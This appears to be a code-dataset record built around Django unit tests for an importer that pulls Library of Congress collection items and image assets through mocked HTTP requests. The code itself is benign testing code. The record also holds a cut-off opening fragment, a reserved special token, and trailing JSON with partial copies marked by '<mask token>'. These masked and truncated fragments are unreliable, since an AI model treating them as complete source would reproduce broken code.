mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails
"""
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
<|reserved_special_token_1|>
# TODO: Add correct copyright header
import io
from unittest.mock import mock_open, patch
from django.test import TestCase
from importer.models import *
from importer.tasks import *
from importer.tests import mock_data
class MockResponse:
"""
This class will be used by the mock to replace requests.get
"""
def __init__(self, json_data, status_code, content=None, reason=" some error"):
self.json_data = json_data
self.status_code = status_code
self.reason = reason
self.content = content
def json(self):
return self.json_data
def iter_content(self, chunk_size=None):
return io.BytesIO(self.content.encode())
class GetItemIdFromItemURLTest(TestCase):
def test_get_item_id_from_item_url_with_slash(self):
"""
Testing get item id from item url if ends with /
"""
# Arrange
url = "https://www.loc.gov/item/mss859430021/"
# Act
resp = get_item_id_from_item_url(url)
# Assert
self.assertEqual(resp, "mss859430021")
def test_get_item_id_from_item_url_without_slash(self):
"""
Testing get item id from item url if ends without /
"""
# Arrange
url = "https://www.loc.gov/item/mss859430021"
# Act
resp = get_item_id_from_item_url(url)
# Assert
self.assertEqual(resp, "mss859430021")
class GETRequestDataTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
:return:
"""
self.url = "https://www.loc.gov/item/mss859430021?fo=json"
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_request_success_json_data(self, mock_get):
"""get data on success json data"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({"msg": "success"}, 200)
mock_get.return_value = mock_resp_instance
# Act
response = get_request_data(self.url)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance.json())
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_request_not_success(self, mock_get):
"""get data on not success"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({"msg": "bad request"}, 400)
mock_get.return_value = mock_resp_instance
# Act
response = get_request_data(self.url)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 400)
self.assertEqual(response, {})
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_request_normal_response(self, mock_get):
"""if json false return repose object with content"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({"msg": "success"}, 200, content="abc")
mock_get.return_value = mock_resp_instance
# Act
response = get_request_data(self.url, json_resp=False)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance)
class GetCollectionPagesTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = "https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971"
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_pages(self, mock_get):
"""
get collection pages successfully with pages info
"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({"pagination": {"total": 10}}, 200)
mock_get.return_value = mock_resp_instance
# Act
response = get_collection_pages(self.url)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 10)
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_sucess_no_pages(self, mock_get):
"""
get collection pages successfully with no pages info
"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({}, 200)
mock_get.return_value = mock_resp_instance
# Act
response = get_collection_pages(self.url)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 0)
class GetCollectionItemidsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = "https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971"
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_item_ids(self, mock_get):
"""
Testing no of collection item ids available in given collection url
"""
# Arrange
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
# Act
response = get_collection_item_ids(self.url, 2)
# Assert
self.assertListEqual(response, ["mss37820001"])
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_item_ids_no_ids(self, mock_get):
"""
Testing no of collection item ids not availabel collection url
"""
# Arrange
mock_page1_result = MockResponse({}, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
# Act
response = get_collection_item_ids(self.url, 2)
# Arrange
self.assertListEqual(response, [])
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = "mss37820001"
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls available in given item id
"""
# Arrange
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
# Act
response = get_collection_item_asset_urls(self.item_id)
# Assert
self.assertListEqual(
response,
[
"http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg"
],
)
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_no_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls not available in given item id
"""
# Arrange
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
# Act
response = get_collection_item_asset_urls(self.item_id)
# Assert
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_asset_item(self, mock_get):
"""
Testing download image and write into disk without error
"""
# Arrange
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
with patch("__main__.open", m, create=True):
# Act
abc = download_write_collection_item_asset("dumy/image/url", "foo")
# Assert
self.assertEquals(abc, True)
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_asset_item_error(self, mock_get):
"""
Testing download image with exception
"""
# Arrange
mock_resp = MockResponse({}, 200, content=Exception("boom"))
mock_get.return_value = mock_resp
m = mock_open()
with patch("__main__.open", m, create=True):
# Act
abc = download_write_collection_item_asset("dumy/image/url", "foo")
# Assert
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = "branch-rickey-papers"
self.project = "test-project"
self.item_id = "mss37820001"
self.url = "https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971"
@patch("importer.tasks.get_save_item_assets")
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url
"""
# Arrange
collection = {
"collection_name": self.name,
"collection_slug": slugify(self.name),
"collection_task_id": "123",
"subcollection_name": self.project,
"subcollection_slug": slugify(self.project),
}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({"pagination": {"total": 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [
mock_resp_page,
mock_page1_result,
mock_page2_result,
mock_resp_item_urls,
]
mock_save.return_value = None
# Act
download_write_collection_item_assets(self.name, self.project, self.url)
ctd = CollectionTaskDetails.objects.get(
collection_slug=self.name, subcollection_slug=self.project
)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
# Assert
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch("importer.tasks.get_save_item_assets")
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_collection_item_asstes_no_db_entry(
self, mock_get, mock_save
):
"""
Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails
"""
# Arrange
mock_resp_page = MockResponse({"pagination": {"total": 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [
mock_resp_page,
mock_page1_result,
mock_page2_result,
mock_resp_item_urls,
]
mock_save.return_value = None
# Act
download_write_collection_item_assets(self.name, self.project, self.url)
ctd = CollectionTaskDetails.objects.get(
collection_slug=self.name, subcollection_slug=self.project
)
ciac = CollectionItemAssetCount.objects.get(
collection_task=ctd, collection_item_identifier=self.item_id
)
# Assert
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = "branch-rickey-papers"
self.project = "test-project"
self.item_id = "mss37820001"
@patch("importer.tasks.get_save_item_assets")
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id
"""
# Arrange
collection = {
"collection_name": self.name,
"collection_slug": slugify(self.name),
"collection_task_id": "123",
"subcollection_name": self.project,
"subcollection_slug": slugify(self.project),
}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
# Act
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(
collection_slug=self.name, subcollection_slug=self.project
)
ciac = CollectionItemAssetCount.objects.get(
collection_task=ctd, collection_item_identifier=self.item_id
)
# Assert
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch("importer.tasks.get_save_item_assets")
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails
"""
# Arrange
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
# Act
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(
collection_slug=self.name, subcollection_slug=self.project
)
ciac = CollectionItemAssetCount.objects.get(
collection_task=ctd, collection_item_identifier=self.item_id
)
# Assert
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
|
flexible
|
{
"blob_id": "b131107d2161634e2c09e0b3ab80dd322d13fbc2",
"index": 2881,
"step-1": "<mask token>\n\n\nclass GetCollectionItemidsTest(TestCase):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [\n 'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'\n ])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, True)\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n mock_resp = MockResponse({}, 200, content=Exception('boom'))\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes_no_db_entry(self,\n mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-2": "<mask token>\n\n\nclass GETRequestDataTest(TestCase):\n <mask token>\n <mask token>\n\n @patch('importer.tasks.requests.get')\n def test_get_request_not_success(self, mock_get):\n \"\"\"get data on not success\"\"\"\n mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 400)\n self.assertEqual(response, {})\n <mask token>\n\n\nclass GetCollectionPagesTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with pages info\n \"\"\"\n mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 10)\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_sucess_no_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with no pages info\n \"\"\"\n mock_resp_instance = MockResponse({}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 0)\n\n\nclass GetCollectionItemidsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids available in given collection url\n \"\"\"\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, ['mss37820001'])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids_no_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids not availabel collection url\n \"\"\"\n mock_page1_result = MockResponse({}, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, [])\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [\n 'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'\n ])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, True)\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n mock_resp = MockResponse({}, 200, content=Exception('boom'))\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes_no_db_entry(self,\n mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
